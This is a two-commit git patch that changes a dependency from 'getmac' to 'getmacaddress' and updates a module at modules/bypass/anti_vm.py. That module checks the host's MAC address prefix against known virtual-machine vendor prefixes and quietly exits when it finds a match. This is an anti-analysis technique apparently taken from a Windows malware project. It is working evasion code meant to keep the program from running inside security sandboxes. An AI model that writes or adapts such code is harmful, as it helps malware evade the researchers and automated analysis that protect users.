From 5b7b1e8cef265239c18c3c1667ace5fb5ace5da0 Mon Sep 17 00:00:00 2001 From: Chris Date: Fri, 10 Dec 2021 13:51:03 -0700 Subject: [PATCH 1/2] Fix bad dependency --- requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/requirements.txt b/requirements.txt index 01adbb4..63ed4d2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ -getmac +getmacaddress datetime pycryptodome Crypto pywin32 -requests \ No newline at end of file +requests From d3162c5fef8d6980385c37cc5c4c540f3983f0f5 Mon Sep 17 00:00:00 2001 From: Chris Date: Fri, 10 Dec 2021 13:51:23 -0700 Subject: [PATCH 2/2] Update anti_vm.py --- modules/bypass/anti_vm.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/bypass/anti_vm.py b/modules/bypass/anti_vm.py index 521d39f..3bf9d04 100644 --- a/modules/bypass/anti_vm.py +++ b/modules/bypass/anti_vm.py @@ -1,9 +1,9 @@ -import getmac,sys +import getmacaddress,sys def check(): vm_macs = ['080027','000569','000C29','001C14','005056','001C42','00163E','0A0027'] - mac = getmac.get_mac_address().split(':') + mac = getmacaddress.get_mac_address().split(':') mac = mac[0]+mac[1]+mac[2] mac = mac.upper() for macs in vm_macs: @@ -11,4 +11,4 @@ def check(): sys.exit(0) return True -check() \ No newline at end of file +check()